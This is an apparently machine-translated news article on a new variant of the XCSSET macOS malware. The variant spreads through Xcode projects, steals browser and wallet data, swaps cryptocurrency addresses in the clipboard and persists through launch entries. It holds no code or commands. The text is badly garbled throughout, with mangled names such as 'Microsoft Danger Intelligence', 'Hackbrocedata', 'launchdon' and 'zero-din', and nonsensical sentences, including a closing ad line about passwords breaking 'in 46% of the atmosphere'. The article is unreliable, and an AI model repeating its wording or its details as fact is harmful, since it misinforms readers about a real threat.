Microsoft Danger Intelligence reports that a new version of XCSSET MACOS malware has been found in limited attacks, including many new features, including extended browser targeting, clipboard kidnapping, and better focus mechanisms.
XCSSET is a modular macos malware that serves as an infostealer and cryptocurrency steeler, stolen notes, cryptocurrency wallets and browser data from infected devices. The malware spreads by discovering and infecting the other Xcode projects found on the device, so that the malware is executed during the construction of the project.
“XCSSET malware is designed to infect Xcode projects, which are usually used by software developers, and a Xcode project being created.”
“We assess that this method of infection and dissemination banks on project files is being shared among developers of apple or MACOS-related applications.”
In a new version viewed by Microsoft, researchers have noted many changes.
It now tries to steal firefox browser data by installing the modified build of open-source Hackbrocedata The tool, which is used to decry and export browser data from the browser data store.
The new version also includes a clipboard-hijacking component update that monitors the MACOS clipboard for regular expression patterns associated with the cryptocurrency address.
When a crypto address is detected, it will replace the address with one related to the attacker. This causes any cryptocurrency to be sent to the attackers to the user infected by the user.
Source: Microsoft
Malware also includes new firm ways, such as making launchdon entries that execute a ~ /.root payload and create a fake system settings in TMP to mascar their activity.
The new version is not yet widespread, and Microsoft reports that it has only seen it in limited attacks. Researchers have also shared their findings with Apple and are working with GITHUB to remove the respective repository.
To protect from this type of malware, it is recommended to keep the MacoS and apps up to date, especially the weaknesses including zero-din have been exploited before considering XCSSET.
Microsoft also recommends that developers always observe Xcode projects before making them, especially when they are shared by others.
The passwords broke in 46% of the atmosphere, almost doubled by 25% last year.
Picus Blue Report 2025 Now get a wider look at more conclusions on prevention, detection and data exfIs.
